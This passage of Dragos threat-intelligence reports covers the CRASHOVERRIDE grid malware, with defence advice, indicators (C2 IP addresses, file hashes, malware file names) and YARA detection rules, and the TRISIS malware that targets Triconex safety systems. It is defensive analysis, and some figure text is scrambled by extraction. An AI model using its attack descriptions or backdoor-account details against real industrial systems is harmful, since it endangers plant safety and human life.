there are many different types of digital relays each with different configurations.
This amplifying attack would be very difficult to do at scale properly and would
require a significant investment on behalf of the adversary.
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
Defense Recommendations
Doing the basics is always appropriate, and it significantly helps move ICS into a
defensible position. However, they are not worth repeating here, and instead, more
tailored approaches specific to ICS security analysts trying to defend against CRASHOVERRIDE and similar capabilities are presented below:
Electric utility security teams should have a clear understanding of where
and how IEC 104 and IEC 61850 protocols are used. North American electric utilities should include DNP3 on this list in case the malware is extended
to impact U.S. systems. Look specifically for increased usage of the protocols against baselines established in the environment. Also, look for systems
leveraging these protocols if they have not before and specifically try to
identify systems that are generating new network flows using these protocols.
Similarly, understand OPC implementations and identify how the protocol is
being used. It is a protocol that is pervasive across numerous sectors. Also,
CRASHOVERRIDE is the second, out of four, ICS tailored malware suite with
OPC capabilities. OPC will appear abnormal in the CRASHOVERRIDE usage
as it is being used to scan all devices on the network which would generate
more traffic than usual.
Robust backups of engineering files such as project logic, IED configuration files, and ICS application installers should be offline and tested. This will
help reduce the impact of the wiper functionality.
Prepare incident response plans for this attack and perform table top exercises bringing in appropriate stakeholders and personnel across engineering, operations, IT, and security. The scenario should include substation
outages with the requirement to do manual operations while recovering the
SCADA environment and gathering appropriate forensics.
The included YARA rules and other indicators of compromise can be leveraged to search for possible infections (IOCs). The YARA rules will provide a
higher confidence towards discovering an infection than the other IOCs and
should be searched for against Windows OT systems especially noting HMIs.
The behavioral analytics to identify the communications on the network
would provide the highest capability to detect this and similar threats.
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
While some defenses and architecture changes may have value in other situations,
the following are responses that are not appropriate for this attack:
Transmission and distribution companies should not rely on the usage of
other protocols such as DNP3 as a protection mechanism. The completeness of the CRASHOVERRIDE framework suggests there may be other undisclosed modules such as a DNP3 module. Also, adding this functionality
into the existing framework would not require extensive work on the part of
the adversary.
Air gapped networks, unidirectional firewalls, anti-virus in the ICS, and other
passive defenses and architecture changes are not appropriate solutions for
this attack. No amount of security control will protect against a determined
human adversary. Human defenders are required
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
Indicators
TYPE
SUBTYPE
Description
ICS Kill Chain
Impact
Host
Mutex Value
ApiPortection9d3
Mutex value checked
Stage 2: Install
Recon
Host
Mutex Value
Mutex value created
Stage 2: Install
Recon
Host
File
C:\Users\\
imapi
File dropped and deleted after program exit
Stage 2: Install
Recon
Host
Service Name
defragsvc
Name given to service start
Stage 2: C2
Remote Access
Network
IP Address
195.16.88.6
External C2 server [DEC 2016] (likely
TOR node at time of attack)
Stage 2: C2
Remote Access
Network
IP Address
93.115.27.57
External C2 server [DEC 2016] (likely
TOR node at time of attack)
Stage 2: C2
Remote Access
Network
IP Address
5.39.218.152
External C2 server [DEC 2016] (likely
TOR node at time of attack)
Stage 2: C2
Remote Access
Network
User Agent String
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Default user agent string used in C2
if unable to get system default user
agent string
Stage 2: C2
Remote Access
Host
Command Line
:\.exe -ip=
-ports=
Command line arguments used to
launch custom port scanner observed
with malware. Command line logging
required to track.
Stage 2: Develop
Recon
Host
Registry Key
HKLM\SYSTEM\CurrentControlSet\Services\\ImagePath
Change in Service Image Path in the
system registry to point to malware
allowing malware to restart on system
reboot.
Stage 2: Installation
Persistence
Host
SHA1 File Hash
F6C21F8189CED6AE150F9EF2E82A3A57843B587D
Traffic to :3128, HTTP
CONNECT to 5.39.218.152:443. Backdoor/RAT.
Phase2: C2
Remote Access
Host
SHA1 File Hash
CCCCE62996D578B984984426A024D9B250237533
Traffic to :3128, HTTP
CONNECT to 5.39.218.152:443. Backdoor/RAT.
Phase2: C2
Remote Access
Host
SHA1 File Hash
8E39ECA1E48240C01EE570631AE8F0C9A9637187
Backdoor/RAT Proxy + HTTP CONNECT to 93.115.27.57:443.
Phase2: C2
Remote Access
Host
SHA1 File Hash
2CB8230281B86FA944D3043AE906016C8B5984D9
Backdoor/RAT Proxy + HTTP CONNECT to 195.16.88.6:443
Phase2: C2
Remote Access
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
Host
SHA1 File Hash
79CA89711CDAEDB16B0CCCCFDCFBD6AA7E57120A
Launcher for payload DLL. Takes input as
three command line parameters
working directory, module, and config file.
Stage 2: Attack
Loss of Control
Host
SHA1 File Hash
94488F214B165512D2FC0438A581F5C9E3BD4D4C
Module for 104 effect. Exports 'Crash'
Stage 2: Attack
which is invoked by launcher. Functionality requires config file.
Loss of Control
Host
SHA1 File Hash
5A5FAFBC3FEC8D36FD57B075EBF34119BA3BFF04
Wiper module, wipes list of files by
extension, removes system processes,
and makes registry changes to prevent
system boot.
Stage 2: Attack
Destruction
Host
SHA1 File Hash
B92149F046F00BB69DE329B8457D32C24726EE00
Wiper module, wipes list of files by
extension, removes system processes,
and makes registry changes to prevent
system boot.
Stage 2: Attack
Destruction
Host
SHA1 File Hash
B335163E6EB854DF5E08E85026B2C3518891EDA8
Custom-built port scanner.
Stage 2: Develop
Recon
Host
SHA1 File Hash
7FAC2EDDF22FF692E1B4E7F99910E5DBB51295E6
OPC Data Access protocol enumeration
of servers and addresses
Stage 2: Attack
Loss of Control
Host
SHA1 File Hash
ECF6ADF20A7137A84A1B319CCAA97CB0809A8454
IEC-61850 enumeration and address
manipulation
Stage 2: Attack
Loss of Control
Host
Filename
opc.exe
OPC Data Access protocol enumeration
of servers and addresses
Stage 2: Attack
Loss of Control
Host
Filename
61850.exe
IEC-61850 enumeration and address
manipulation
Stage 2: Attack
Loss of Control
Host
Filename
haslo.exe
Wiper module, wipes list of files by
extension, removes system processes,
and makes registry changes to prevent
system boot.
Stage 2: Attack
Destruction
Host
Filename
104.dll
IEC-104 module
Stage 2: Attack
Loss of Control
Host
Filename
haslo.dat
Wiper module
Stage 2: Attack
Destruction
OPC Server
OPC Group
Aabdul
OPC DA Module
Stage 2: Attack
Loss of Visibility
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
Yara Rules
Also found at https://github.com/dragosinc/CRASHOVERRIDE
import
import
hash
rule dragos_crashoverride_exporting_dlls
meta:
description =
CRASHOVERRIDE v1 Suspicious Export
author =
Dragos Inc
condition:
pe.exports(
Crash
) & pe.characteristics
rule dragos_crashoverride_suspcious
meta:
description =
CRASHOVERRIDE v1 Wiper
author =
Dragos Inc
strings:
$s0 =
SYS_BASCON.COM
fullword nocase wide
$s1 =
.pcmp
fullword nocase wide
$s2 =
.pcmi
fullword nocase wide
$s3 =
.pcmt
fullword nocase wide
$s4 =
.cin
fullword nocase wide
condition:
pe.exports(
Crash
) and any of ($s*)
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
YARA Rules
rule dragos_crashoverride_name_search {
meta:
description =
CRASHOVERRIDE v1 Suspicious Strings and Export
author =
Dragos Inc
strings:
$s0 =
101.dll
fullword nocase wide
$s1 =
Crash101.dll
fullword nocase wide
$s2 =
104.dll
fullword nocase wide
$s3 =
Crash104.dll
fullword nocase wide
$s4 =
61850.dll
fullword nocase wide
$s5 =
Crash61850.dll
fullword nocase wide
$s6 =
OPCClientDemo.dll
fullword nocase wide
$s7 =
fullword nocase wide
$s8 =
CrashOPCClientDemo.dll
fullword nocase wide
$s9 =
D2MultiCommService.exe
fullword nocase wide
$s10 =
CrashD2MultiCommService.exe
fullword nocase wide
$s11 =
61850.exe
fullword nocase wide
$s12 =
OPC.exe
fullword nocase wide
$s13 =
haslo.exe
fullword nocase wide
$s14 =
haslo.dat
fullword nocase wide
condition:
any of ($s*) and pe.exports(
Crash
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
YARA Rules
rule dragos_crashoverride_hashes {
meta:
description =
CRASHOVERRIDE Malware Hashes
author =
Dragos Inc
condition:
filesize < 1MB and
hash.sha1(0, filesize) ==
f6c21f8189ced6ae150f9ef2e82a3a57843b587d
hash.sha1(0, filesize) ==
cccce62996d578b984984426a024d9b250237533
hash.sha1(0, filesize) ==
8e39eca1e48240c01ee570631ae8f0c9a9637187
hash.sha1(0, filesize) ==
2cb8230281b86fa944d3043ae906016c8b5984d9
hash.sha1(0, filesize) ==
79ca89711cdaedb16b0ccccfdcfbd6aa7e57120a
hash.sha1(0, filesize) ==
94488f214b165512d2fc0438a581f5c9e3bd4d4c
hash.sha1(0, filesize) ==
5a5fafbc3fec8d36fd57b075ebf34119ba3bff04
hash.sha1(0, filesize) ==
b92149f046f00bb69de329b8457d32c24726ee00
hash.sha1(0, filesize) ==
b335163e6eb854df5e08e85026b2c3518891eda8
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
YARA Rules
rule dragos_crashoverride_moduleStrings {
meta:
description =
IEC-104 Interaction Module Program Strings
author =
Dragos Inc
strings:
$s1 =
IEC-104 client: ip=%s; port=%s; ASDU=%u
nocase wide ascii
$s2 =
MSTR ->> SLV
nocase wide ascii
$s3 =
MSTR <<- SLV
nocase wide ascii
$s4 =
Unknown APDU format !!!
nocase wide ascii
$s5 =
iec104.log
nocase wide ascii
condition:
any of ($s*)
rule dragos_crashoverride_configReader
meta:
description =
CRASHOVERRIDE v1 Config File Parsing
author =
Dragos Inc
strings:
$s0 = { 68 e8 ?? ?? ?? 6a 00 e8 a3 ?? ?? ?? 8b f8 83 c4 ?8 }
$s1 = { 8a 10 3a 11 75 ?? 84 d2 74 12 }
$s2 = { 33 c0 eb ?? 1b c0 83 c8 ?? }
$s3 = { 85 c0 75 ?? 8d 95 ?? ?? ?? ?? 8b cf ?? ?? }
condition:
all of them
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
YARA Rules
rule dragos_crashoverride_weirdMutex
meta:
description =
Blank mutex creation assoicated with CRASHOVERRIDE
author =
Dragos Inc
strings:
$s1 = { 81 ec 08 02 00 00 57 33 ff 57 57 57 ff 15 ?? ?? 40 00 a3 ?? ?? ?? 00
85 c0 }
$s2 = { 8d 85 ?? ?? ?? ff 50 57 57 6a 2e 57 ff 15 ?? ?? ?? 00 68 ?? ?? 40 00}
condition:
all of them
rule dragos_crashoverride_serviceStomper
meta:
description =
Identify service hollowing and persistence setting
author =
Dragos Inc
strings:
$s0 = { 33 c9 51 51 51 51 51 51 ?? ?? ?? }
$s1 = { 6a ff 6a ff 6a ff 50 ff 15 24 ?? 40 00 ff ?? ?? ff 15 20 ?? 40 00 }
condition:
all of them
C R A S H OV E R R I D E : Threat to the Electic Grid Operations
YARA Rules
rule dragos_crashoverride_wiperModuleRegistry
meta:
description =
Registry Wiper functionality assoicated with CRASHOVERRIDE
author =
Dragos Inc
strings:
$s0 = { 8d 85 a0 ?? ?? ?? 46 50 8d 85 a0 ?? ?? ?? 68 68 0d ?? ?? 50 }
$s1 = { 6a 02 68 78 0b ?? ?? 6a 02 50 68 b4 0d ?? ?? ff b5 98 ?? ?? ?? ff 15
04 ?? ?? ?? }
$s2 = { 68 00 02 00 00 8d 85 a0 ?? ?? ?? 50 56 ff b5 9c ?? ?? ?? ff 15 00 ??
?? ?? 85 c0 }
condition:
all of them
rule dragos_crashoverride_wiperFileManipulation
meta:
description =
File manipulation actions associated with CRASHOVERRIDE wiper
author =
Dragos Inc
strings:
$s0 = { 6a 00 68 80 00 00 00 6a 03 6a 00 6a 02 8b f9 68 00 00 00 40 57 ff 15
1c ?? ?? ?? 8b d8 }
$s2 = { 6a 00 50 57 56 53 ff 15 4c ?? ?? ?? 56 }
condition:
all of them
TRISIS Malware
Analysis of Safety System Targeted Malware
Dragos Inc.
www.dragos.com
version 1.20171213
Executive Summary
TLP: WHITE information may be distributed without restriction
In mid-November 2017, the Dragos, Inc. team discovered ICS-tailored malware deployed against at least
one victim in the Middle East. The team identifies this malware as TRISIS because it targets Schneider Electric
s Triconex safety instrumented system (SIS) enabling the replacement of logic in final control elements.
TRISIS is highly targeted and likely does not pose an immediate threat to other Schneider Electric customers, let alone other SIS products. Importantly, the malware leverages no inherent vulnerability in Schneider
Electric products. However, this capability, methodology, and tradecraft in this very specific event may now
be replicated by other adversaries and thus represents an addition to industrial asset owner and operators
threat models.
Why Are We Publishing This?
The Dragos team notified our ICS WorldView customers immediately after validating the malicious nature
of the software. Following that notification, the team sent a notification to the U.S. Department of Homeland Security, Department of Energy, Electric Sector Information Sharing Analysis Center (E-ISAC), and partners. We broadcasted to our customers and partners that we would not be releasing a public report until
the information became public through other channels. It is Dragos
approach around industrial threats to
never be the first to identify new threats publicly; infrastructure security is a highly sensitive matter and the
more time the infrastructure community has to address new challenges without increased public attention
is ideal. Dragos
focus is on keeping customers informed and ideally keeping sensitive information out of
the public where the narrative can be quickly lost and sensationalized. However, once information about
threats or new capabilities are made public, it is Dragos
approach to follow-up with public reports that
capture the nuance to avoid hype while reinforcing lessons learned and advice to the industry.
Key Take-Aways
TLP: WHITE information may be distributed without restriction
The malware targets Schneider Electric
s Triconex safety instrumented system (SIS) thus the name
choice of TRISIS for the malware.
TRISIS has been deployed against at least one victim.
The victim identified so far is in the Middle East, and currently, there is no intelligence to support that
there are victims outside of the Middle East.
The Triconex line of safety systems are leveraged in numerous industries - however, each SIS is unique
and to understand process implications would require specific knowledge of the process. This means
that this is not a highly scalable attack that could be easily deployed across numerous victims without
significant additional work.
The Triconex SIS Controller was configured with the physical keyswitch in
program mode
during operation. If the controller is placed in Run mode (program changes not permitted), arbitrary changes in
logic are not possible substantially reducing the likelihood of manipulation.
Although the attack is not highly scalable, the tradecraft displayed is now available as a blueprint to
other adversaries looking to target SIS and represents an escalation in the type of attacks seen to date
as it is specifically designed to target the safety function of the process.
Compromising the security of an SIS does not necessarily compromise the safety of the system. Safety
engineering is a highly specific skill set and adheres to numerous standards and approaches to ensure
that a process has a specific safety level. As long as the SIS performs its safety function the compromising of its security does not represent a danger as long as it fails safe.
It is not currently known what exactly the safety implications of TRISIS would be. Logic changes on the
final control element implies that there could be risk to the safety as set points could be changed for
when the safety system would or would not take control of the process in an unsafe condition
SIS Background
TLP: WHITE information may be distributed without restriction
Safety systems are those control systems, often identified as Safety Instrumented Systems (SIS), maintaining safe conditions if other failures occur. It is not currently known what the specific safety implications of
TRISIS would be in a production environment. However, alterations to logic on the final control element
imply that there could be a risk to operational safety. Set points on the remainder of the process control
system could be changed to conditions that would result in the process shifting to an unsafe condition.
While TRISIS appears to be focused, ICS owners and operators should view this event as an expansion of
ICS asset targeting to previously-untargeted SIS equipment. Although many aspects of TRISIS are unique
for the environment and technology targeted, the general methodology provides an example for ICS defenders to utilize when future, subsequent SIS-targeted operations emerge.
Safety controllers are designed to provide robust safety for critical processes. Typically, safety controllers
are deployed to provide life-saving stopping logic. These may include mechanisms to stop rotating machinery when a dangerous condition is detected, or stop inflow or heating of gasses when a dangerous temperature, pressure, or other potentially life-threatening condition exists. Safety controllers operate independently of normal process control logic systems and are focused on detecting and preventing dangerous
physical events. Safety controllers are most often connected to actuators which will make it impossible for
normal process control systems to continue operating. This is by design since the normal process control
system
s continued operation would feed into the life-threatening situation that has been detected.
Safety controllers are generally a type of programmable logic controller (PLC). They allow engineers to configure logic, typically in IEC-61131 logic. While on their face they are similar to PLCs, safety controllers have
a higher standard of design, construction, and deployment. They are designed to be more accurate and
less prone to failure. Both the hardware and the software for these controllers must be designed and built
to the Safety Integrity Level (SIL) blanket of standards (IEC-61508). This includes the use of error correcting
memories and redundant components and design that favors failing an operation safety over continuing
operations. Each SIS is deployed for specific process requirements after a process hazard analysis (PHA)
identifies the needs for a specific industrial environment. In this way, the systems are unique in their implementation even when the vendor technology remains the same.
Safety controller components have more flexibility than a typical PLC. A safety controller
s output cards will
usually have a firmware, and a configuration, which allows the output card to fail into a safe state should
the main processors fail entirely. This may even include failing outputs to a known-safe state in the event
that the safety controller loses power.
Many safety controllers offer redundancy, in the form of redundant processor modules. In the case of the
Triconex system, the controller utilizes three separate processor modules. The modules all run the same
logic, and each module is given a vote on the output of its logic function blocks on each cycle. If one of the
modules offers a different set of outputs from the other two, that module is considered faulted and is automatically removed from service. This prevents a module that is experiencing an issue such as an internal
transient or bit-flip from causing an improper safety decision.
TLP: WHITE information may be distributed without restriction
Safety controller architecture has been debated in the industry. Many end users opt to use the same control LAN for both systems. LOGIIC (Linking the Oil and Gas Industry to Improve Cybersecurity) has identified1 three distinct integration strategies of SIS with control systems networks. In the case of attacks such
as TRISIS, these architectures can be reduced to two, as the security implications of two identified architectures remain the same. End users decide the level of risk that they are willing to accept with their safety
system, and use this to determine how tightly they couple their safety system with their DCS (Distributed
Control System). A tightly-coupled architecture, shown in figure 1, can provide cost savings, since data from
an SIS controller may be incorporated into general operator HMI systems. In addition, network wiring and
support is shared between the systems. Sensors data may also be shared, in both directions, between the
normal process controllers and the SIS controllers. However, a downside to such an architecture is that
attacker who gains access to the Control LAN systems may attack the SIS directly.
Figure 1: Typical (Insecure) SIS integration
DMZ LAN
Historian/
Data Replication
RDP Jump Box/
Remote Station
Patch Management
RDP Jump Box/
Remote Station
Domain Controller
L3 Process LAN
Historian
OPC Server
DCS HMI/
DCS EWS/
Operator Terminal Engineering Station
DCS EWS/
Remote Station
DCS OPC/
Application Server
SIS EWS/
Safety Eng Station
L2 Process LAN
DCS Controller
SIS Controller
Actuators & Sensors
Actuators & Sensors
Cyber Security Implications of SIS Integration with Control Networks
https://www.automationfederation.org/filestore/af/logiic/LOGIIC%20SIS%20REPORT%20for%20ISA%20August%2025%20
2011%20mod%20jan%202013.pdf
TLP: WHITE information may be distributed without restriction
This architecture can be especially dangerous when combined with engineering remote access. A common
practice at many sites is to allow access to the process control network to engineers via the Remote Desktop Protocol. The engineer will most frequently use their corporate workstation to access an RDP jump box
inside of the process control DMZ. From there, the engineering may RDP to either the L3 or L2 process LAN.
Compromise of this process, either through an infected corporate workstation or theft of the engineer
credentials, can give an attacker access to the L2 engineering systems. In the case of a tightly integrated
DCS and SIS, the attacker then has access to all services of the SIS, including the programming service. The
attacker may also be able to gain access to the SIS Engineering Station and gain a better understanding of
how the SIS is programmed.
Figure 2: Architecture with application-layer
Read-Only
firewall between L2 and SIS LAN
DMZ LAN
Historian/
Data Replication
RDP Jump Box/
Remote Station
Patch Management
RDP Jump Box/
Remote Station
Domain Controller
L3 Process LAN
Historian
OPC Server
DCS HMI/
DCS EWS/
Operator Terminal Engineering Station
DCS EWS/
Remote Station
DCS OPC/
Application Server
SIS EWS/
Safety Eng Station
L2 Process LAN
DCS Controller
SIS Controller
Actuators & Sensors
Actuators & Sensors
TLP: WHITE information may be distributed without restriction
Alternate architectures have been suggested. Many security-conscious asset owners will instrument their
SIS Controller with a
read-only
application-layer firewall as shown in figure 2. These firewalls typically support protocols such as Modbus/TCP or OPC and are specifically designed to prevent the assertion of safety
outputs from the process LAN. These firewalls will also prevent access to the proprietary configuration
services of the SIS, closing that avenue of attack. Placing both the SIS Engineering Workstation (EWS) and
SIS Controllers on the secure side of this firewall will prevent easy access to the SIS programming protocols. In this architecture, an attacker who gains access to the L2 LAN will not be able to impact the safety
system, unless the attacker also identifies a weakness in the firewall protecting the SIS from the rest of the
L2 Process LAN. A downside of this architecture is that an engineer will need to physically access the SIS
workstation to make changes to the safety programming. However, SIS programming changes should be
much less frequent than normal DCS updates.
Other methods use data diodes or completely separate safety networks which provide data to the DCS via
a DC Controller add-on card. These mechanisms further increase security, although in the case of a completely separate safety network, prevent end users from using potentially valuable safety sensor data for
ordinary process control.
A potential attack on SIS can have multiple implications. Two that immediately come to mind and represent
most-likely targets include the following scenarios:
Attack Scenario #1: Plant Shutdown
The most likely and operationally easy impact scenario from SIS manipulation or attack is a plant shutdown
and not necessarily due to follow-on physical damage as the result of SIS alteration. There are two
general methods of achieving an operational
mission kill
without physically impacting any element of the
target environment:
1. Create operational uncertainty. By altering an SIS where some noticeable effect is produced, even
if only recognizing a configuration change or tripping a safety fault where no corresponding physical condition is observed, doubt is introduced into operations as to safety system accuracy and
reliability. While the problem is investigated and troubleshooting takes place, operations will likely be significantly reduced if not outright stopped.
2. Trip safety
fail-safes
to halt operations. Changing underlying logic to enter safety-preserving
conditions during normal operations can trip SIS-managed equipment to enter
fail-safe
modes
when such conditions are not actually present. This will lead to a likely halt or stop to the affected
process, and likely bring about a much longer shutdown as this scenario rapidly transitions to the
item outlined in no. 1 above due to extensive troubleshooting.
Some level of general and plant-specific knowledge is required in order to execute this attack, but the level
of knowledge is not as extensive as more fine-toothed, subtle changes to SIS configuration. Simply introducing any noticeable change in the system
which may, through unintended follow-on effects, result in
a much more serious issue
results at least in case #1. A slightly more refined approach focusing on specific logic and devices managed can be used to create case #2. Alternatively, an adversary can attempt to
leverage insecure authentication to pull existing configuration information from the SIS and simply reverse
values to cause safety faults where none exist.
TLP: WHITE information may be distributed without restriction
Attack Scenario #2: Unsafe Physical State
Likely the most obvious and assumed attack scenario is creating an unsafe physical condition within the
target environment resulting in physical damage to the environment. While this may be the most obvious
conceptual attack, the requirements for actually executing make this scenario significantly more difficult
and thus less likely in reality
than scenario #1.
Ensuring an SIS alteration results in physical damage or destruction requires knowledge of the underlying
physical processes and controls managed by the targeted SIS. More specifically, knowledge of specific process points where removing a logical fail-safe at the SIS will result in an uncontrolled, damaging physical
state
with no complementary physical safety fail-safe in place to prevent damage. The amount of knowledge required specific to the SIS and process installation targeted is significant, and likely not possible to
obtain through purely network espionage means. If even possible, the amount of time, effort, and resources required to: obtain necessary environment information; develop and design software tailored to the
target environment; and finally, to maintain access and avoid detection throughout these steps all require
a lengthy, highly skilled intrusion.
While the above is certainly not impossible
in many ways, it is analogous to the efforts required to launch
CRASHOVERRIDE
the combined requirements make this a less-likely scenario attainable only by highly-skilled, well-resourced adversaries with lengthy timelines. Typical operations safety layering, where SIS
forms only part (albeit a large one) in overall safety management, should work to mitigate the worst-case
damage a destruction scenario in most instances.
SIS Defense Status
TLP: WHITE information may be distributed without restriction
In theory, SIS equipment is isolated from other operations within the ICS environment, and network connectivity is either extremely limited or non-existent. In practice, operational and convenience concerns often result in more connectivity with other ICS devices than ideal, or that ICS operators may even be aware
of. An operator may choose to connect a safety controller to their wider plant network in order to retrieve
data from the controller to facilitate business intelligence and process control information gathering. This
carries the risk that the safety controller may be affected by malicious network activity, or accessible to an
intruder that has penetrated the ICS network.
Safety controllers generally have the same security profile as a standard PLC. Controller projects offer
password protection; however, projects typically contain two backdoor accounts by default that the user
has no control over. While suboptimal from a security perspective, such accounts are vital to ensure administrator-level access and control over the device in an emergency situation. A reverse engineer with
moderate skill may uncover these accounts and use them to gain unauthorized access to the project and
to the safety controller.
While common to many SIS devices, the newer versions of Schneider Electric
s Triconex units are not susceptible to this attack. The older controller (which was deployed at the victim site) is protected by following
the deployment recommendations, listed below, to prevent arbitrary changes in SIS functionality via a
physical control. Newer model controllers removed the backdoor accounts entirely and added X.509 mutual authentication to the controllers.
Examining SIS devices generally, backdoor accounts cannot typically be disabled due to the operational
need for the reasons outlined above. SIS network isolation is critical in preventing abuse of this feature in
vulnerable devices it is appropriate to monitor connections to such systems more so than blocking activity
without an understanding of the impact.
TRISIS Capabilities
TRISIS is a Stage 2 ICS Attack capability, as defined by the ICS Cyber Kill Chain as shown in figure 3. Given its
design and assessed use, TRISIS has no role or applicability to IT environments and is a focused ICS effects
tool. As a result, TRISIS
use and deployment requires that an adversary has already achieved success in
Stage 1 of the ICS Cyber Kill Chain and either compromised the business IT network or has identified an
alternative means of accessing the ICS network. Once in position, the adversary can deploy TRISIS on its
target: an SIS device.
TLP: WHITE information may be distributed without restriction
Figure 3: ICS Cyber Kill-Chain
Reconnaissance
Weaponization
STAGE
Delivery
STAGE
Exploit
STAGE
Install / Modify
STAGE
STAGE
STAGE
STAGE
Develop
STAGE
Test
STAGE
Deliver
STAGE
Install / Modify
STAGE
Targeting
STAGE 1
STAGE 2
STAGE
Execute ICS Attack
STAGE
TLP: WHITE information may be distributed without restriction
TRISIS is a compiled Python script using the publicly-available
py2exe
compiler. This allows TRISIS to execute in an environment without Python installed natively, which would be the case in most ICS environments and especially in SIS equipment. The script aims to change the underlying logic on a target SIS
this case, a Schneider Electric Triconex device. Subsequent code analysis indicated the script is designed
to target Triconex 3008 processor modules specifically. The executable takes its target as a command-line
argument passed to it on execution. The implications of this are specifically in targeting at run-time, unless
called through an additional script, and based on a review of the code, limiting TRISIS to impacting a single
target per execution.
The core logic alteration functionality works through a combination of four binaries that are uploaded to
the target SIS:
Two embedded binary payloads within the compiled Python script.
Two additional, external binaries that are specifically referenced by name within the script but
located in separate files.
Dragos analysis indicates that the embedded items are used to prepare and load the external modules,
which contain the replacement logic. As part of a general attack flow, an adversary would need to take the
following steps to deploy and execute TRISIS as shown in figure 4 on the next page.
TLP: WHITE information may be distributed without restriction
Completion of Stage 1 of the ICS Cyber Kill Chain:
Identify and gain access to a system able to communicate with target SIS.
Figure 4: TRISIS Attack Flow
Stage 1 of the ICS Cyber Kill Chain Completed
Stage 2 Develop:
Identify target SIS type and develop TRISIS with replacement logic and loader
Stage 2 Test:
TRISIS
Ensure TRISIS works as intended, likely off network in
the adversary environment
Stage 2 Deliver:
Step 1: Verify Communications to SIS
Transfer TRISIS to the SIS which contains the
loader
module for the new logic and support binaries that
provide the new logic
Stage 2 Install/Modify:
Upon running the TRISIS executable, disguised as
Triconex software for analyzing SIS logs, the malicious software utilizes the embedded binary files to
identify the appropriate location in memory on the
controller for logic replacement and uploads the
initializing code
(4-byte sequence)
Step 2: Identify Memory Location for
Step 1: VerifyLogic
Communications
to SIS
Upload
Step 3: Copy
Start Code
for Logic
Step 1: Verify Communications to SIS
Replacement and Verify
Stage 2 Execute ICS Attack:
TRISIS verifies the success of the previous step and
then uploads new ladder logic to SIS
Step 4:
1: Upload
Verify Communications
New Ladder Logic
to to
SISSIS
TLP: WHITE information may be distributed without restriction
Based on the description above, TRISIS itself represents a facilitating capability or framework for the actual
ladder logic change that has the potential, as outlined in the scenarios above, to alter the environment. As
such, TRISIS itself could be repurposed to deliver alternative payloads to either deliver different logic files
(the external binaries uploaded by TRISIS to the target SIS) or to utilize differently embedded binaries to
target different SIS types entirely. While both are quite plausible, the work involved would be significant
and represents the largest amount of effort and required resources for TRISIS efficacy: ensuring that the
embedded binaries identify the correct portion of SIS memory for replacement ladder logic upload, and
then developing appropriate ladder logic for the target system. Neither of these is trivial, and make scaling
or spreading this attack to other environments
and potentially the same Triconex devices but in different
installations
extremely difficult.
Dragos was not provided with the external binaries used in the TRISIS attack, and we are therefore unable
to determine what precise impact would result on the victim SIS. Nonetheless, any modification to SIS in
an operational environment represents a significant risk and potential for damage or even loss of life. The
precise attack path is also unknown at this time, but based upon available information and functionality of
TRISIS, the target SIS must be network accessible from a device the adversary was able to compromise and
establish reasonably persistent command and control over. As a result, TRISIS activity
from initial installation through periodic control followed by ultimate payload delivery
represents multiple steps across
Stages 1 and 2 of the ICS Cyber Kill Chain.
While TRISIS as a Python program allows for some level of flexibility in that different modules could be referenced or included to provide different effects, as an attack vector such alterations are difficult to execute
in practice for the reasons outlined above. As such, TRISIS is a very focused, target-specific malware that
would not be capable of delivering equivalent effects in another environment without significant modification.
An additional point to emphasize is that no real vulnerability or exploit is utilized by TRISIS. Rather, TRISIS
functionality depends upon understanding how Triconex SIS devices function and specifics about the process environment. With a full understanding of these items, the adversary then must design and deploy
ladder logic to create the desired impact on the target SIS.
TLP: WHITE information may be distributed without restriction
Implications
TRISIS represents, in several ways,
game-changing
impact for the defense of ICS networks. While previously identified in theoretical attack scenarios, targeting SIS equipment specifically represents a dangerous evolution within ICS computer network attacks. Potential impacts include equipment damage, system
downtime, and potentially loss of life. Given these implications, it is important to ensure nuance in how the
industry responds and communicates about this attack.
First, adversaries are becoming bolder, and an attack on an SIS is a considerable step forward in causing
harm. This requires the industry to continue its focus on reliability and safety by pursuing appropriate and
measured steps towards securing industrial processes. Information technology security best practices are
not necessarily appropriate to such situations and an ICS, and a mission-focused approach must be taken
into consideration of secondary effects.
Second, the attack of an SIS cannot be taken lightly but should not be met with hype and fear. Eventually,
information about this attack will leak to the media and public community. At that point, those in the industrial security community can have a nuanced conversation noting that this attack is not a highly scalable
attack that has immediate repercussions to the community. Or simply stated, the public nor government
should invoke fear. The industrial asset owner, operator, and vendor community have had a significant
dedication to safety and reliability, and now it is obvious that the community is taking steps forward in security. Dragos cautions the community not to use this attack to further other causes as the impact of hype
can be far-reaching and crippling. TRISIS is a learning moment to push for more security but in a proper
and measured way.
Third, this attack does have implications for all industrial asset owners and operators that leverage SIS. The
fact that Schneider Electric
s Triconex was targeted should have no bearing on how defenders respond to
this case. This was a clear attack on the community. There can be no victim blaming or product shaming
that is reasonable nor will it make the community better. The implication is that adversaries are targeting
SIS and defenders must live in this reality presented adapting as appropriate to ensure safety and reliability
of the operations our society depend upon.
TLP: WHITE information may be distributed without restriction
Defending Against TRISIS
SIS system implementation should begin with relevant vendor recommendations. The recommendations
surrounding methods on network isolation are especially critical to preserving SIS autonomy. In the case of
TRISIS, Schneider Electric has provided the following recommendations for Triconex Controllers
Safety systems should always be deployed on isolated networks.
Physical controls should be in place so that no unauthorized person would have access to the
safety controllers, peripheral safety equipment, or the safety network.
All controllers should reside in locked cabinets and never be left in the
Program
mode.
All Tristation terminals (Triconex programming software) should be kept in locked cabinets and
should never be connected to any network other than the safety network.
All methods of mobile data exchange with the isolated safety network such as CDs, USB drives,
etc. should be scanned before use in the Tristation terminals or any node connected to this network.
Laptops that have connected to any other network besides the safety network should never be
allowed to connect to the safety network without proper sanitation. Proper sanitation includes
checking for changes to the system not simply running anti-virus software against it (in the case
of TRISIS no major anti-virus vendor detected it at the time of its use).
Operator stations should be configured to display an alarm whenever the Tricon key switch is in
the
Program Mode.
It is important to understand that TRISIS represents only the second stage of the ICS Cyber Kill Chain. This
report does not infer or suggest what stage 1 of the attack may be and instead focuses on what has been
confirmed through capability analysis. This puts defenders in the position of not stopping activities prior
